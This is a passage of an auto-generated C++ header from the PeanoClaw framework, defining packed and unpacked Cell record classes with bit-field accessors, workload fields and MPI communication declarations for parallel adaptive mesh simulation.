(DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | evenFlags.to_ulong() << (3)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); _packedRecords0 = static_cast<short int>( cellIsAForkCandidate ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ CellPacked(); /** * Generated */ CellPacked(const PersistentRecords& persistentRecords); /** * Generated */ CellPacked(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate); /** * Generated */ virtual ~CellPacked(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _persistentRecords._packedRecords0 = static_cast<short int>( isInside ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | state << (1)); } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | evenFlags.to_ulong() << (3)); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; return (_persistentRecords._packedRecords0& mask); } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); assertion(!evenFlags || evenFlags==1); int shift = 3 + elementIndex; int mask = 1 << (shift); int shiftedValue = evenFlags << (shift); _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 & ~mask; _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 | shiftedValue; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; _persistentRecords._packedRecords0^= mask; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); _persistentRecords._packedRecords0 = static_cast<short int>( cellIsAForkCandidate ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ Cell convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifdef PackedRecords #pragma pack (pop) #endif #elif defined(Parallel) && !defined(Debug) && defined(SharedMemoryParallelisation) /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::Cell { public: typedef peanoclaw::records::CellPacked Packed; enum State { Leaf = 0, Refined = 1, Root = 2 }; struct PersistentRecords { int _cellDescriptionIndex; bool _isInside; State _state; #ifdef UseManualAlignment std::bitset<DIMENSIONS> _evenFlags __attribute__((aligned(VectorisationAlignment))); #else std::bitset<DIMENSIONS> _evenFlags; #endif #ifdef UseManualAlignment tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber __attribute__((aligned(VectorisationAlignment))); #else tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; #endif int _responsibleRank; bool _subtreeHoldsWorker; double _nodeWorkload; double _localWorkload; double _totalWorkload; double _maxWorkload; double _minWorkload; bool _cellIsAForkCandidate; int _numberOfLoadsFromInputStream; int _numberOfStoresToOutputStream; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _state = state; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _evenFlags = (evenFlags); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellIsAForkCandidate; } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellIsAForkCandidate = cellIsAForkCandidate; } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfStoresToOutputStream = numberOfStoresToOutputStream; } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ Cell(); /** * Generated */ Cell(const PersistentRecords& persistentRecords); /** * Generated */ Cell(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); /** * Generated */ virtual ~Cell(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._state = state; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._evenFlags = (evenFlags); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); return _persistentRecords._evenFlags[elementIndex]; } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags[elementIndex]= evenFlags; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags.flip(elementIndex); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellIsAForkCandidate; } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellIsAForkCandidate = cellIsAForkCandidate; } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfStoresToOutputStream = numberOfStoresToOutputStream; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string 